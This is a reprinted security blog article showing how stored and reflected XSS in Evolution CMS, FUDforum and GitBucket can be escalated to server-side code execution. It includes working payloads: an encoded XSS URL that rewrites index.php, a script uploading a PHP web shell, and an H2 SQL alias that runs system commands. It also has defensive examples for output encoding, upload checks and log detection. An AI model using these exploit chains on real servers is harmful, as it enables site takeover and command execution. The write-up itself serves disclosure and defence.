Several open source cases from XSS to RCE

XSS (cross-site scripting) is a vulnerability whose exploitation executes arbitrary JavaScript in a victim's browser; RCE (remote code execution) lets an attacker execute arbitrary system commands on the server. So how can an XSS vulnerability be escalated to RCE? Today we share a few open source cases. Original:
https://swarm.ptsecurity.com/researching-open-source-apps-for-xss-to-rce-flaws/

0x01 Using the file modification function. Project name: Evolution CMS v3.1.8

Project address: https://github.com/evolution-cms/evolution
While auditing the source code, a user-controlled parameter was found that is output without encoding or escaping. This is a typical reflected XSS vulnerability. File path: manager/views/page/user_roles/permission.blade.php


Next, construct the URL to be accessed and insert the payload to verify the XSS vulnerability:
https://192.168.1.76/manager/?a=35&id=1%22%3E%3Cimg%20src=1%20οnerrοr=alert(document.domain)% 3E
This page is not accessible to every user; it requires administrator privileges. After opening it, the payload we inserted pops up:

In the Evolution CMS admin back end, the file manager can upload files, but not PHP files. However, the manager can edit existing files, so JavaScript can drive the file-editing function and replace the content of index.php with phpinfo():
$.get('/manager/?a=31', function(d) {
    let p = $(d).contents().find('input[name="path"]').val();
    $.ajax({
        url: '/manager/index.php',
        type: 'POST',
        contentType: 'application/x-www-form-urlencoded',
        data: 'a=31&mode=save&path=' + p + '/index.php&content=<?php phpinfo(); ?>'
    });
});
Next, base64-encode the JavaScript code and insert it into the vulnerable parameter:
https://192.168.1.76/manager/?a=35&id=1%22%3E%3Cimg%20src=1%20οnerrοr=eval(atob(%27JC5nZXQoJy9tYW5hZ2VyLz9hPTMxJyxmdW5jdGlvbihkKXtsZXQgcCA9ICQoZCkuY29udGVudHMoKS5maW5kKCdpbnB1dFtuYW1lPSJwYXRoIl0nKS52YWwoKTskLmFqYXgoe3VybDonL21hbmFnZXIvaW5kZXgucGhwJyx0eXBlOidQT1NUJyxjb250ZW50VHlwZTonYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkJyxkYXRhOidhPTMxJm1vZGU9c2F2ZSZwYXRoPScrcCsnL2luZGV4LnBocCZjb250ZW50PTw/cGhwIHBocGluZm8oKTsgPz4nfSk7fSk7%27))%3E
Accessing the above URL with administrator privileges successfully modifies the content of the home page's index.php:
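The root cause in this case is an attribute value written into the template without encoding. The following is an added example (not Evolution CMS code; the template fragment is a constructed stand-in for the line in permission.blade.php) that renders the article's id payload twice: once concatenated raw, as an unescaped template expression does, and once passed through attribute-context HTML encoding. As a general Blade rule, `{{ $x }}` applies htmlspecialchars while `{!! $x !!}` prints the value raw; the example makes that difference visible on this payload.

```javascript
// Added example, not code from the article or from Evolution CMS.
// Shows why the reflected `id` parameter becomes XSS and how output
// encoding for the HTML attribute context neutralises it.

// Encode the five characters that can close a quoted attribute or open a tag.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable rendering (constructed stand-in for the template line): the
// request parameter is concatenated into the markup as-is.
function renderVulnerable(id) {
  return '<input type="hidden" name="id" value="' + id + '">';
}

// Fixed rendering: identical markup, value encoded for attribute context.
function renderSafe(id) {
  return '<input type="hidden" name="id" value="' + escapeHtml(id) + '">';
}

// Reviewer's check on rendered output: a second '<' means the value opened
// a new element instead of staying inside the attribute.
function injectsMarkup(html) {
  return (html.match(/</g) || []).length > 1;
}

// The article's payload, URL-decoded: id=1"><img src=1 onerror=alert(document.domain)>
const PAYLOAD = '1"><img src=1 onerror=alert(document.domain)>';

console.log(renderVulnerable(PAYLOAD)); // attribute closed early, <img> element injected
console.log(renderSafe(PAYLOAD));       // value stays inert text inside the attribute
```

The encoded output keeps the attribute closed exactly where the template intended, so the browser never sees an element boundary inside the user-controlled value.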

0x02 Using arbitrary file upload. Project name: FUDforum v3.1.1

Project address: https://github.com/fudforum/FUDforum
FUDforum is an ultra-fast and scalable forum program. It is highly customizable and supports unlimited members, forums, posts, topics, polls and attachments.
In this program, the user-controlled attachment name of a private message or forum topic is output without any processing, which is a stored XSS vulnerability. Renaming the uploaded file to <img src=1 onerror=alert()>.png and then downloading it triggers the XSS:


The FUDforum admin panel has a file manager that allows uploading files to the server, including files with a .php extension, so an attacker can use the stored XSS to upload a PHP file that executes arbitrary commands on the server.
FUDforum has a public vulnerability:
https://packetstormsecurity.com/files/155261/FUDForum-3.0.9-Code-Execution-Cross-Site-Scripting.html
Using JavaScript code to upload a PHP file:
const action = '/adm/admbrowse.php';
function uploadShellWithCSRFToken(csrf) {
    let cur = '/var/www/html/fudforum.loc';
    let boundary = "-----------------------------347796892242263418523552968210";
    let contentType = "application/x-php";
    let fileName = 'shell.php';
    let fileData = "<?=`$_GET[cmd]`?>";
    let xhr = new XMLHttpRequest();
    xhr.open('POST', action, true);
    xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary=" + boundary);
    let body = "--" + boundary + "\r\n";
    body += 'Content-Disposition: form-data; name="cur"\r\n\r\n';
    body += cur + "\r\n";
    body += "--" + boundary + "\r\n";
    body += 'Content-Disposition: form-data; name="SQ"\r\n\r\n';
    body += csrf + "\r\n";
    body += "--" + boundary + "\r\n";
    body += 'Content-Disposition: form-data; name="fname"; filename="' + fileName + '"\r\n';
    body += "Content-Type: " + contentType + "\r\n\r\n";
    body += fileData + "\r\n\r\n";
    body += "--" + boundary + "\r\n";
    body += 'Content-Disposition: form-data; name="tmp_f_val"\r\n\r\n';
    body += "1" + "\r\n";
    body += "--" + boundary + "\r\n";
    body += 'Content-Disposition: form-data; name="d_name"\r\n\r\n';
    body += fileName + "\r\n";
    body += "--" + boundary + "\r\n";
    body += 'Content-Disposition: form-data; name="file_upload"\r\n\r\n';
    body += "Upload File" + '\r\n';
    body += "--" + boundary + "--";
    xhr.send(body);
}
// Fetch the admin file-manager page first to obtain the CSRF token (SQ), then upload.
let req = new XMLHttpRequest();
req.onreadystatechange = function() {
    if (req.readyState == 4 && req.status == 200) {
        let response = req.response;
        uploadShellWithCSRFToken(response.querySelector('input[name=SQ]').value);
    }
};
req.open("GET", action, true);
req.responseType = "document";
req.send();
An attacker can send themselves a private message with the above code as the attachment. After the message is sent, the path of the attachment on the server is obtained: index.php?t=getfile&id=7&private=1
The next step is to construct a new payload that triggers the file-upload payload:
$.get('index.php?t=getfile&id=7&&private=1', function(d) { eval(d); })
Base64-encode the above payload and use it as the following file name:
<img src=1 onerror=eval(atob('JC5nZXQoJ2luZGV4LnBocD90PWdldGZpbGUmaWQ9NyYmcHJpdmF0ZT0xJyxmdW5jdGlvbihkKXtldmFsKGQpfSk='))>.png
After the administrator reads the private message and attachment sent by the attacker, a file named shell.php is created on the server with the administrator's permissions, and this backdoor can be used to execute arbitrary commands:
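Two server-side controls break this chain: the attachment name is user data and must be normalised on upload (and still encoded on output), and a web file manager should refuse executable extensions outright. The following is an added example, not FUDforum code; the extension lists and the 128-character cap are assumptions, and the inputs are the article's own file names plus constructed ones.

```javascript
// Added example, not code from the article or from FUDforum.
// Input-side hardening for uploaded attachment names.

// Extensions the web server would execute if the file landed under the web root
// (assumed list; extend for the server's actual handler configuration).
const EXECUTABLE_EXT = new Set([".php", ".phtml", ".php3", ".php4", ".php5", ".phar", ".phps"]);
// What the attachment feature is expected to accept (assumed allowlist).
const ATTACHMENT_ALLOWLIST = new Set([".png", ".jpg", ".jpeg", ".gif", ".pdf", ".txt", ".zip"]);

// Normalise a client-supplied file name: keep only the last path segment, drop
// control characters, neutralise markup/shell metacharacters, collapse
// whitespace and cap the length. The result is safe to store and to log.
function sanitizeAttachmentName(name) {
  let base = String(name).split(/[\\/]/).pop();   // basename for both separators
  base = base.replace(/[\x00-\x1f\x7f]/g, "");    // control characters
  base = base.replace(/[<>"'&`]/g, "_");           // cannot open a tag or quote later
  base = base.replace(/\s+/g, " ").trim();
  if (base === "" || base === "." || base === "..") base = "attachment";
  return base.slice(0, 128);
}

// Every extension in a multi-extension name is returned, so "shell.php.png"
// yields [".php", ".png"] and is still treated as executable.
function allExtensions(name) {
  return name.toLowerCase().split(".").slice(1).map((e) => "." + e);
}

// Decide whether an upload may be stored. Returns { ok, reason, name }.
function checkUpload(name, allowlist = ATTACHMENT_ALLOWLIST) {
  const clean = sanitizeAttachmentName(name);
  const exts = allExtensions(clean);
  if (exts.length === 0) return { ok: false, reason: "no extension", name: clean };
  if (exts.some((e) => EXECUTABLE_EXT.has(e))) return { ok: false, reason: "executable extension", name: clean };
  if (!allowlist.has(exts[exts.length - 1])) return { ok: false, reason: "extension not allowlisted", name: clean };
  return { ok: true, reason: "", name: clean };
}

// Constructed inputs: the article's two file names plus common evasions.
for (const n of ["<img src=1 onerror=alert()>.png", "shell.php", "shell.php.png", "../../etc/passwd", ".htaccess", "report.pdf"]) {
  console.log(JSON.stringify(n), "->", JSON.stringify(checkUpload(n)));
}
```

The sanitised name no longer contains `<` or `>`, so even a page that forgets to encode it cannot be turned into a script injection point; output encoding remains the primary control, this is defence in depth.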

0x03 Using the database to execute commands. Project name: GitBucket v4.37.1

Project address: https://github.com/gitbucket/gitbucket
GitBucket is a Scala-based Git platform with easy installation, high scalability and GitHub API compatibility. In GitBucket, it was found that user-controlled issue names are displayed unescaped on the home page and on the attacker's profile page (/hacker?tab=activity), which results in stored XSS:


With the XSS vulnerability in hand, the next step is to look for functions that can execute system commands. The management control panel has a tool for executing SQL queries. GitBucket uses the H2 database engine by default:
https://www.h2database.com/html/main.html
For this database there is a publicly available vulnerability that achieves remote code execution:
https://gist.github.com/h4ckninja/22b8e2d2f4c29e94121718a43ba97eed
An attacker can create PoC code based on this vulnerability:
var url = "/admin/dbviewer/_query";
$.post(url, {query: 'CREATE ALIAS EXECVE AS $$ String execve(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A"); return s.hasNext() ? s.next() : ""; }$$;'})
  .done(function(data) {
    $.post(url, {query: "CALL EXECVE('touch HACKED')"});
  });
Upload this code to the repository:

Then create a new issue, or rename an existing one:
Issue 1"><script src="/hacker/Repo1/raw/f85ebe5d6b979ca69411fa84749edead3eec8de0/exploit.js"></script>
When the administrator visits the attacker's profile page, the payload executes and creates a file on the server;

Check on the server whether the file was created successfully:
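All three chains leave the same kinds of traces in request logs: an HTML or JavaScript fragment in a parameter, an eval(atob('...')) wrapper hiding the real script, and then an admin-session action that the administrator would rarely perform by hand (saving PHP through the file manager, uploading a .php file, running CREATE ALIAS or CALL through the SQL console). The following is an added example, not code from the article or from any of the three projects, of a log scanner for those indicators; the log lines are constructed (paths mirror the article, addresses and bodies are made up), and the indicator list is a starting point, not a claim about what these products log.

```javascript
// Added example, not code from the article or the projects it discusses.
// Request-log detection for the XSS-to-admin-function chains above.

const INDICATORS = [
  { id: "html-tag-in-param", re: /<\s*(img|script|svg|iframe)\b/i },
  { id: "event-handler",     re: /\bon(error|load|mouseover|focus)\s*=/i },
  { id: "php-tag-in-param",  re: /<\?(php|=)/i },            // PHP written via a web form
  { id: "h2-create-alias",   re: /\bCREATE\s+ALIAS\b/i },    // H2 user-defined Java function
  { id: "h2-call-alias",     re: /\bCALL\s+\w+\s*\(/i },
  { id: "executable-upload", re: /filename="[^"]*\.ph(p\d?|tml|ar)"/i },
];

// Extract and decode every base64 argument of atob('...') / atob("...") so the
// wrapped script is inspected too (one level; nested wrappers would need a loop).
function decodeAtobArgs(text) {
  const out = [];
  const re = /atob\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)/g;
  let m;
  while ((m = re.exec(text)) !== null) out.push(Buffer.from(m[1], "base64").toString("utf8"));
  return out;
}

// Logs usually hold the percent-encoded form; decode once, tolerating bad escapes.
// '+' is deliberately left alone so base64 inside a URL survives.
function urlDecode(s) {
  try { return decodeURIComponent(s); } catch (e) { return s; }
}

// Scan one line. Returns the indicator ids that matched; "(decoded)" marks a
// hit that was only visible after decoding an atob() argument.
function scanLine(line) {
  const hits = new Set();
  const decoded = urlDecode(line);
  const layers = [decoded, ...decodeAtobArgs(decoded)];
  layers.forEach((text, depth) => {
    for (const ind of INDICATORS) {
      if (ind.re.test(text)) hits.add(depth === 0 ? ind.id : ind.id + "(decoded)");
    }
  });
  return [...hits];
}

function scanLog(lines) {
  return lines.map((line) => ({ line, hits: scanLine(line) })).filter((r) => r.hits.length > 0);
}

// Constructed sample log. INNER stands in for the article's wrapped script.
const INNER = "$.post('/manager/index.php', 'a=31&mode=save&content=<?php phpinfo(); ?>')";
const B64 = Buffer.from(INNER).toString("base64");
const SAMPLE_LOG = [
  '10.0.0.5 GET /manager/?a=35&id=1%22%3E%3Cimg%20src=1%20onerror=eval(atob(%27' + B64 + '%27))%3E 200',
  '10.0.0.5 POST /manager/index.php body="a=31&mode=save&path=/var/www/index.php&content=%3C%3Fphp%20phpinfo()%3B%20%3F%3E" 200',
  '10.0.0.7 POST /adm/admbrowse.php multipart filename="shell.php" 200',
  '10.0.0.9 POST /admin/dbviewer/_query query="CREATE ALIAS EXECVE AS $$ ... $$" 200',
  "10.0.0.9 POST /admin/dbviewer/_query query=\"CALL EXECVE('touch HACKED')\" 200",
  '10.0.0.3 GET /index.php?t=getfile&id=7&private=1 200',   // benign-looking fetch
  '10.0.0.2 GET /hacker?tab=activity 200',                   // benign page view
];

for (const r of scanLog(SAMPLE_LOG)) console.log(r.hits.join(","), "<-", r.line.slice(0, 70));
```

Hits on the admin-side actions (file-manager save, executable upload, SQL console DDL) are the high-confidence ones; a parameter containing `<img` alone is noisy on its own but, combined with a decoded atob() payload in the same request, is worth an alert. The attachment download and profile view lines show that the pivot requests themselves look ordinary, which is why the surrounding admin actions are what to watch.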

0x04 Summary

This article takes real open source projects as examples and demonstrates how an XSS vulnerability can be escalated to a command execution vulnerability. The core still depends on functions of the system itself, or file upload and command execution weaknesses in components the system depends on; otherwise command execution cannot be achieved directly through an XSS vulnerability.
Usually the admin back end of an application system has rich functions and high privileges, including the ability to upload and modify arbitrary files, as well as database operations and command execution. Through XSS, an attacker can make the administrator's browser access and execute those back-end functions and thereby obtain higher privileges. In practice, if the target is an open source system it can be analysed and exploited well; if it is an unknown system, it is difficult to understand the back-end functions and the vulnerability is not easy to exploit.

Reprinted from: Aleksey Solovev Xin'an Road

https://mp.weixin.qq.com/s/qK6EfQdoO43C49S6ehPc7w


Origin blog.csdn.net/qq_18209847/article/details/128296533